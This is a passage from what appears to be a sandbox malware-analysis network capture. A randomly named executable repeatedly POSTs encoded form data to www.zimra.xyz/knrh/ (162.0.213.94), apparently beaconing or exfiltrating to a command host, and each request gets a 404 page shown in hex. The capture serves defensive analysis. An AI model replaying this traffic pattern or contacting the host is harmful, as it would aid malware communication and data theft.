                                                              Sep 11, 2024 22:56:47.204463005 CEST1236INData Raw: 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 43 36 45 42 34 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                              Data Ascii: background-color: #3C6EB4; font-size: 1.1em; font-weight: bold; color: #fff; margin: 0; padding: 0.5em; border-bottom: 2px solid #294172;
                                                              Sep 11, 2024 22:56:47.204510927 CEST1127INData Raw: 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 6f 6d 65 74 68 69 6e 67 20 68 61 73 20 74 72 69 67 67 65 72 65 64 20 6d 69 73 73 69 6e
                                                              Data Ascii: <div class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is distributed with


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              33192.168.2.759694162.0.213.94805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:56:52.269952059 CEST687OUTPOST /knrh/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.zimra.xyz
                                                              Origin: http://www.zimra.xyz
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.zimra.xyz/knrh/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 56 69 49 41 62 5a 61 58 48 75 6f 2b 78 79 68 7a 52 30 43 42 4a 55 6c 7a 2f 4e 32 39 63 50 76 73 31 70 4a 49 31 4f 6b 6d 5a 78 36 58 79 70 5a 53 69 2f 69 66 54 74 73 7a 74 30 32 50 6c 65 73 59 64 32 4b 4f 45 74 38 6a 4d 42 47 76 70 38 4e 73 44 5a 44 30 30 50 36 72 66 79 4f 47 70 70 45 6b 4a 31 4a 64 35 54 72 2b 45 53 55 73 7a 6e 64 62 37 72 30 68 51 69 34 6a 52 65 32 6e 5a 61 74 58 50 4d 45 4a 6b 6a 44 34 34 56 54 31 36 32 4d 67 55 74 53 49 49 6c 44 47 57 31 4d 69 33 63 42 6c 54 63 56 42 63 4d 61 7a 4e 39 36 43 36 68 6c 6f 52 45 71 62 52 62 43 31 74 46 74 39 4f 45 4d 63 4f 63 6b 54 45 78 46 37 35 46 57 72 7a 52 63 33 41 67 3d 3d
                                                              Data Ascii: XvhP6L=ViIAbZaXHuo+xyhzR0CBJUlz/N29cPvs1pJI1OkmZx6XypZSi/ifTtszt02PlesYd2KOEt8jMBGvp8NsDZD00P6rfyOGppEkJ1Jd5Tr+ESUszndb7r0hQi4jRe2nZatXPMEJkjD44VT162MgUtSIIlDGW1Mi3cBlTcVBcMazN96C6hloREqbRbC1tFt9OEMcOckTExF75FWrzRc3Ag==
                                                              Sep 11, 2024 22:56:52.870445013 CEST1236INHTTP/1.1 404 Not Found
                                                              Date: Wed, 11 Sep 2024 20:56:52 GMT
                                                              Server: Apache
                                                              Content-Length: 16052
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                              Sep 11, 2024 22:56:52.870465040 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                              Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                              Sep 11, 2024 22:56:52.870481014 CEST1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                              Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                              Sep 11, 2024 22:56:52.870496988 CEST1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                              Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                              Sep 11, 2024 22:56:52.870512962 CEST896INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                              Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                              Sep 11, 2024 22:56:52.870553970 CEST1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                              Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                              Sep 11, 2024 22:56:52.870568991 CEST1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                              Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                              Sep 11, 2024 22:56:52.870584011 CEST448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                              Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                              Sep 11, 2024 22:56:52.870867968 CEST1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                              Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                              Sep 11, 2024 22:56:52.871037960 CEST1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                              Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                                                              Sep 11, 2024 22:56:52.875444889 CEST1236INData Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                                                              Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              34192.168.2.759695162.0.213.94805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:56:54.803069115 CEST707OUTPOST /knrh/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.zimra.xyz
                                                              Origin: http://www.zimra.xyz
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.zimra.xyz/knrh/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 56 69 49 41 62 5a 61 58 48 75 6f 2b 77 52 35 7a 54 54 57 42 4f 30 6c 38 6a 64 32 39 56 76 76 77 31 70 4e 49 31 4c 63 49 5a 44 75 58 38 70 70 53 77 74 4b 66 47 74 73 7a 31 45 32 77 34 75 74 57 64 32 48 7a 45 74 77 6a 4d 42 43 76 70 39 39 73 44 4b 37 33 30 66 36 70 57 53 4f 45 6e 4a 45 6b 4a 31 4a 64 35 54 75 56 45 53 4d 73 7a 58 74 62 37 4a 63 6d 5a 43 34 6b 53 65 32 6e 64 61 74 54 50 4d 46 61 6b 69 50 53 34 57 6e 31 36 33 63 67 56 34 75 48 42 6c 43 4e 62 56 4d 30 7a 75 4d 39 55 64 4e 76 65 4e 2b 77 49 64 53 64 79 33 34 4b 4c 6d 6d 33 50 4b 36 4f 70 48 4a 4c 5a 69 52 70 4d 64 67 4c 4a 54 78 61 6d 79 7a 42 2b 44 39 7a 57 53 42 74 51 2f 59 36 53 55 65 79 74 52 4b 52 68 58 6c 7a 62 5a 55 3d
                                                              Data Ascii: XvhP6L=ViIAbZaXHuo+wR5zTTWBO0l8jd29Vvvw1pNI1LcIZDuX8ppSwtKfGtsz1E2w4utWd2HzEtwjMBCvp99sDK730f6pWSOEnJEkJ1Jd5TuVESMszXtb7JcmZC4kSe2ndatTPMFakiPS4Wn163cgV4uHBlCNbVM0zuM9UdNveN+wIdSdy34KLmm3PK6OpHJLZiRpMdgLJTxamyzB+D9zWSBtQ/Y6SUeytRKRhXlzbZU=
                                                              Sep 11, 2024 22:56:55.423834085 CEST1236INHTTP/1.1 404 Not Found
                                                              Date: Wed, 11 Sep 2024 20:56:55 GMT
                                                              Server: Apache
                                                              Content-Length: 16052
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                              Sep 11, 2024 22:56:55.423850060 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                              Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                              Sep 11, 2024 22:56:55.423866034 CEST448INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                              Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                              Sep 11, 2024 22:56:55.423877954 CEST1236INData Raw: 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33 38 20 2d 30 2e 39 31 34 31 30 33 2c 31 2e 35 30 33 36 35 20 2d 31 2e 36
                                                              Data Ascii: 68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396 2.209666,-0.76581 4.0014
                                                              Sep 11, 2024 22:56:55.423888922 CEST1236INData Raw: 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33 34 33 32 2c 38 2e 32 34 39 37 31 20 2d 34 2e 37 35 30 33 31 35 2c 31 31
                                                              Data Ascii: 49655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91675 15.180267,5
                                                              Sep 11, 2024 22:56:55.423903942 CEST448INData Raw: 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33 39 35 38 31 20 35 2e 34 31 36 36 36 2c 36 2e 31 36 36 36 37 20 31 30 2e 37 34 39 39 36 2c 31 32 2e 34 39 39 39 35 20
                                                              Data Ascii: 786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.4206
                                                              Sep 11, 2024 22:56:55.423953056 CEST1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                              Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                              Sep 11, 2024 22:56:55.423983097 CEST1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                              Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                              Sep 11, 2024 22:56:55.423995018 CEST1236INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                              Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                              Sep 11, 2024 22:56:55.424020052 CEST672INData Raw: 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20
                                                              Data Ascii: e-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4560" d="m 13.113199,198.16821 c 47.547038,0.40361 95.093071,0.80721 142.638101,1.2108" style="display:inline;fill:none;s
                                                              Sep 11, 2024 22:56:55.428843021 CEST1236INData Raw: 20 20 20 20 20 20 20 20 72 78 3d 22 32 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 79 3d 22 32 33 38 2e 30 38 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 31 31 39 2e 31 32 32 36 32 22 0a 20 20 20 20 20 20 20 20 20
                                                              Data Ascii: rx="2.5" cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterl


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              35192.168.2.759696162.0.213.94805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:56:57.359627962 CEST1720OUTPOST /knrh/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.zimra.xyz
                                                              Origin: http://www.zimra.xyz
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.zimra.xyz/knrh/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 56 69 49 41 62 5a 61 58 48 75 6f 2b 77 52 35 7a 54 54 57 42 4f 30 6c 38 6a 64 32 39 56 76 76 77 31 70 4e 49 31 4c 63 49 5a 44 32 58 38 59 4a 53 69 61 2b 66 41 64 73 7a 72 30 32 4c 34 75 74 62 64 32 66 2f 45 74 74 63 4d 43 32 76 71 66 31 73 58 72 37 33 2f 66 36 70 4a 43 4f 42 70 70 46 6b 4a 31 35 6e 35 53 65 56 45 53 4d 73 7a 56 46 62 39 62 30 6d 56 69 34 6a 52 65 32 56 5a 61 74 37 50 50 30 76 6b 69 62 6f 2f 67 58 31 35 57 73 67 57 4b 47 48 4f 6c 43 50 59 56 4e 33 7a 75 41 63 55 5a 74 6a 65 4e 61 57 49 65 79 64 68 47 39 79 57 46 61 74 5a 34 75 6e 72 58 31 77 59 42 64 56 43 63 38 31 48 44 6c 35 75 79 44 73 2f 51 41 79 66 46 45 42 53 39 30 33 65 32 53 56 73 30 53 61 36 6c 5a 4e 4e 75 50 6c 6b 73 69 58 42 63 74 52 61 65 68 54 48 34 2f 79 6d 51 30 43 79 4a 53 79 64 39 72 4b 57 71 2b 78 33 4c 2f 31 66 6b 4d 30 71 77 36 58 38 49 33 57 74 6b 54 6f 30 49 61 2f 33 4b 49 4f 4e 54 34 6d 71 37 45 6b 39 31 6b 76 6b 6d 77 36 6e 71 56 68 6d 41 34 70 39 5a 39 6e 67 73 48 6a 58 30 44 51 34 6c 54 [TRUNCATED]
                                                              Data Ascii: XvhP6L=ViIAbZaXHuo+wR5zTTWBO0l8jd29Vvvw1pNI1LcIZD2X8YJSia+fAdszr02L4utbd2f/EttcMC2vqf1sXr73/f6pJCOBppFkJ15n5SeVESMszVFb9b0mVi4jRe2VZat7PP0vkibo/gX15WsgWKGHOlCPYVN3zuAcUZtjeNaWIeydhG9yWFatZ4unrX1wYBdVCc81HDl5uyDs/QAyfFEBS903e2SVs0Sa6lZNNuPlksiXBctRaehTH4/ymQ0CyJSyd9rKWq+x3L/1fkM0qw6X8I3WtkTo0Ia/3KIONT4mq7Ek91kvkmw6nqVhmA4p9Z9ngsHjX0DQ4lTo15CeGkTKcZYTnMLcgoXuP8cIy22sxFPObW+SMNtTKoztlNT03iwu/gq1nc2gVb8FR6zlxnxrKv32hUw9vF9qUYpmo6LhTr6e1TAd1LDnFhB26XIeH3+bffa6huCPZpxZdlYzbDNQZxJZt+FQU4jqX+hxVK7BwbsmU2gjYtx9lSDTqnh8MPOIhxz2p3OtN2LhVn2awqw8JJrVjRgLtirrIVUp1wcXWmzsZ5eg6ma5dwjRxB7HLqRn8hUBgee4esLx/WoR+6e4NEX0Vux0zRfDDoTeF9ZzU597SeQf6Bw2l3LidF3sL5DyRzsXnGjvO84Bdl/rO5ZX3L821aPqcJiodPuYbpO79NTKUApV/IxG+lG1HZC68rW8MxezMwQXLRquDpdm0yNaSlx8DMBjFpLuhpPVvMC/7zNTyS5Kvuin+l3yImmgGSYS2gucLYE3BRP28Ad77u/cp/21h0fcK/D7GePz0e0NIVhQbI6aqtRgr6vhRmACoqeXaSq0zJdpj/vaHyK4aiPUwffE5EYon/rk7xQXxCIZYXQtP7IOo9DwS1+QYlqsdvhoMApAvJBiE/15B02V1o0n2IuZfujU+dFbu4yPNSrrrpiqM4CMa+kBt8OJF7nBgJf4YMDb1XALftft6eS/37hAgVwqpPct4+q4dLlIMUcUzfUC0 [TRUNCATED]
